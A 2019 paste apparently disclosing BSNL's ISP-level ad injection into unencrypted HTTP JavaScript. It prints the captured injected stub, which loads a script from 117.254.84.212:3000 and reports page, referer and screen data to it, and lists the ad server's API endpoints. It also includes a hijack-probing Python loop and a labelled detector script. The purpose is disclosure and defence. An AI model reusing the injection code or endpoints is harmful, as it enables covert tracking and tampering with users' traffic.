BSNL Ad Injection Network Documentation

a guest
May 30th, 2019
BSNL Ad Injection Documentation:

When a user on BSNL browses any unsecured (http) website, and that site loads a JavaScript file from another unsecured (http) source (so the request carries an HTTP 'Referer' header), the ISP, sitting between the user and the origin, monitors the request, hijacks it and answers with its own script.

Example request:
GET /wp-includes/js/wp-emoji-release.min.js?ver=5.0.4 HTTP/1.1
Host: planetgoahomes.in
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://planetgoahomes.in/properties-to-sell/
Connection: keep-alive
Cookie: pum-2844=true; pvc_visits[0]=1553233919b610a1553234126b1003


Response:
!function(){var a="/wp-includes/js/wp-emoji-release.min.js?ver=5.0.4",r=null,e=document.getElementsByTagName("script"),i=e.length,n=null,t=Date.now(),s=null,o=0;for("/"===a.substring(0,1)&&(a=a.substring(1)),o=0;o<i;o+=1)if(void 0!==e[o].src&&null!==e[o].src&&e[o].src.indexOf(a)>-1){n=o,r=e[o];break}void 0!==r&&null!==r||(r=document.getElementsByTagName("script")[0]),s=r.src.indexOf("?")>-1?r.src+"&cb="+t.toString()+"&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag":r.src+"?cb="+t.toString()+"&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag";try{if(void 0===window.sarazasarazaNoti||null===window.sarazasarazaNoti||window.sarazasarazaNoti===Array&&window.sarazasarazaNoti.indexOf(r.src)<0){void 0!==window.sarazasarazaNoti&&null!==window.sarazasarazaNoti||(window.sarazasarazaNoti=new Array),window.sarazasarazaNoti.push(r.src);var c=r.parentNode,d=r;if(r.async||r.defer||null!==n&&n!==e.length-1){var w=document.createElement("script");w.src=s,c.replaceChild(w,d)}else document.write("<script type='text/javascript' src="+s+"><\/script>"),c.removeChild(d)}if(window===window.top&&(void 0===window.sarazasaraza||null===window.sarazasaraza||!window.sarazasaraza)){window.sarazasaraza=!0;var l="117.254.84.212:3000/getjs?nadipdata="+JSON.stringify("%7B%22url%22:%22%2Fwp-includes%2Fjs%2Fwp-emoji-release.min.js%3Fver%3D5.0.4%22%2C%22referer%22:%22http:%2F%2Fplanetgoahomes.in%2Fproperties-to-sell%2F%22%2C%22host%22:%22planetgoahomes.in%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%2C%22nadipdomain%22:8%7D")+"&screenheight="+screen.height+"&screenwidth="+screen.width+"&tm="+(new Date).getTime()+"&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0";!function(a,r,e,i,n,t,s){t=r.createElement(e),s=r.getElementsByTagName(e)[0],t.async=!0,t.src=i,s.parentNode.insertBefore(t,s)}(window,document,"script","//"+l)}}catch(a){}}();


Once a hijack happens, injection is paused for 65 seconds to reduce suspicion, so if the above request is repeated within 65 s you receive the genuine response.
The headers of the hijacked response also differ clearly from the original ones: the Content-Type is application/x-javascript instead of text/javascript.

Code to test the interval [Python]:
import socket
import time

def getD():
    # Open a plain HTTP connection and send one raw request for a script
    # over http with a Referer header, the condition that triggers the hijack.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("www-personal.umich.edu", 80))

    msg = b''
    msg += b'GET /~bazald/l/api/dynsections.js HTTP/1.1\r\n'
    msg += b'Host: www-personal.umich.edu\r\n'
    msg += b'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0\r\n'
    msg += b'Accept: */*\r\n'
    msg += b'Accept-Language: en-US,en;q=0.5\r\n'
    msg += b'Accept-Encoding: gzip, deflate\r\n'
    msg += b'Referer: http://www-personal.umich.edu/~bazald/l/api/_s_d_l__main_8h_source.html\r\n'
    msg += b'Connection: Close\r\n'
    msg += b'Cookie: BIGipServer~WEBHOSTING-PROD-MACC~WWW_PERSONAL_HTTP=2483540877.20480.0000\r\n'
    msg += b'\r\n'

    s.sendall(msg)
    allR = b''

    # Read until the server closes the connection (Connection: Close).
    while True:
        chunk = s.recv(16)
        if chunk == b'':
            s.close()
            break
        allR += chunk

    return allR

ctr = 0
while True:
    dd = getD()
    # The genuine response carries text/javascript; the hijacked one does not.
    if b"Content-Type: text/javascript" in dd:
        ctr += 1
        print('Not Hijacked')
    else:
        print('!!!!Hijacked!!!!')

    # Adjust the sleep period to see changes; >= 65 will always result in a hijacked script
    time.sleep(65)


When the browser executes the above script, it re-inserts the originally requested script (with a cache-buster and a fingerprint parameter appended to its URL) and appends a new script tag to the DOM.
The injected script tag looks like this:
<script async="" src="//117.254.84.212:3000/getjs?nadipdata=&quot;%7B%22url%22:%22%2Fajax%2Flibs%2Fjquery%2F1.8.3%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Fdigg.com%2F%22%2C%22host%22:%22ajax.googleapis.com%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%2C%22nadipdomain%22:1%7D&quot;&amp;screenheight=768&amp;screenwidth=1366&amp;tm=1559199614846&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>

You can see that the screen resolution is sent to the ad server.
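The following detector is an added example, not part of the original paste: it flags a captured HTTP response using the two signs described above (the rewritten Content-Type and the markers of the injected stub) and decodes the URL-encoded nadipdata JSON and the base64 fingerprint that the stub sends to the ad server. The marker strings are taken from the captured stub; the two sample responses are constructed.

```python
import base64
import json
import re
from urllib.parse import unquote
# Indicators taken from the injected stub captured above.
AD_SERVER = "117.254.84.212:3000"
MARKERS = ("sarazasaraza", "getjs?nadipdata=", AD_SERVER)
NADIPDATA_RE = re.compile(r"(%7B%22url%22.*?%7D)")
FINGERPRINT_RE = re.compile(r"fingerprint=([A-Za-z0-9+/=]+)")

def is_injected(js_body: str) -> bool:
    """True when the JS body carries any marker of the injection stub."""
    return any(m in js_body for m in MARKERS)

def decode_nadipdata(js_body: str) -> dict:
    """Decode the URL-encoded JSON (path, referer, host, tags) the stub reports."""
    m = NADIPDATA_RE.search(js_body)
    return json.loads(unquote(m.group(1))) if m else {}

def decode_fingerprint(js_body: str) -> str:
    """Decode the base64 'fingerprint' tag appended to the rewritten script URL."""
    m = FINGERPRINT_RE.search(js_body)
    return base64.b64decode(m.group(1)).decode("ascii") if m else ""

def classify_response(raw: bytes) -> dict:
    """Split a raw HTTP response and flag both signs described above:
    Content-Type rewritten to application/x-javascript, stub markers in the body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    ctype = ""
    for line in head.decode("latin-1").split("\r\n")[1:]:  # skip status line
        name, _, value = line.partition(":")
        if name.strip().lower() == "content-type":
            ctype = value.strip().lower()
    text = body.decode("utf-8", "replace")
    return {"content_type": ctype,
            "suspicious_type": ctype.startswith("application/x-javascript"),
            "injected": is_injected(text),
            "leaked": decode_nadipdata(text),
            "fingerprint": decode_fingerprint(text)}

# Constructed samples: a slice of the captured stub above, and a clean reply.
SAMPLE_HIJACKED = (
    b"HTTP/1.1 200 OK\r\nContent-Type: application/x-javascript\r\n\r\n"
    b'var l="117.254.84.212:3000/getjs?nadipdata="+JSON.stringify("%7B%22url%22:%22'
    b'%2Fwp-includes%2Fjs%2Fwp-emoji-release.min.js%3Fver%3D5.0.4%22%2C%22referer%22:%22'
    b'http:%2F%2Fplanetgoahomes.in%2Fproperties-to-sell%2F%22%2C%22host%22:%22'
    b'planetgoahomes.in%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D'
    b'%2C%22nadipdomain%22:8%7D")+"&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0";')
SAMPLE_CLEAN = (b"HTTP/1.1 200 OK\r\nContent-Type: text/javascript\r\n\r\n"
                b"/* wp-emoji-release.min.js */ !function(){}();")
```

Run classify_response on the bytes returned by getD() above to get the leaked path, referer and host alongside the hijack verdict.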

This script then loads a 340 KB obfuscated script tailored to the subscriber, which embeds their subscriber ID and IP address.

The server is otherwise unreachable and only listens on port 3000 for HTTP requests.

If you open the root page of the ad server (http://117.254.84.212:3000/), it displays the following:

------------------------------------------
Express

Welcome to Express
------------------------------------------

The server exposes a JSON ad API at http://117.254.84.212:3000/api/getnoti (GET) and http://117.254.84.212:3000/api/logerror (POST), and possibly more endpoints.

Example:

URL: http://117.254.84.212:3000/api/getnoti?tm=1559201611495&subscriberId=c2g4MzIyNDYyMzA1X3djZHJAYnNubC5pbg==&subscriberIP=<Snipped by me>&nadipdata="{\"url\":\"/ajax/libs/jquery/1.8.3/jquery.min.js\",\"referer\":\"http://digg.com/\",\"host\":\"ajax.googleapis.com\",\"categories\":[0],\"reputations\":[1],\"nadipdomain\":1}"&screenheight=768&screenwidth=1366&preadid=-1&cycle=false&_=1559201610551

[GET request]
Host: 117.254.84.212:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://digg.com/
Origin: http://digg.com
Connection: keep-alive

[Response]
{"message":"No Ad available. Error calculatedAd null 3.","error":true}

------------------------------------------
Immediately afterwards the following request is made, which shows that BSNL logs ad requests and errors together with the user's IP address:

URL: http://117.254.84.212:3000/api/logerror?tm=1559201611901

[POST request]
Host: 117.254.84.212:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://digg.com/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 378
Origin: http://digg.com
Connection: keep-alive
Cache-Control: max-age=0

[Query string]
tm 1559201611901

[Form data]
error No+data+in+getnoti
methodName loadFirstAd:+nadipdata:+{"message":"No+Ad+available.+Error+calculatedAd+null+3.","error":true}
params {"browser":"Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:67.0)+Gecko/20100101+Firefox/67.0","referer":"http://digg.com/","subscriberIP":"<Snipped by me>"}

[Response]
{"message":"Ok"}

Current solution:
The hijack itself is unsolved, but the ad injection can be avoided by blocking the IP address 117.254.84.212, so the ad script never loads. Note that the hijacked stub still executes and still rewrites the original script URL; only the ad-serving script is blocked. Sites served over HTTPS are not affected, since the injection only works on unencrypted (http) requests.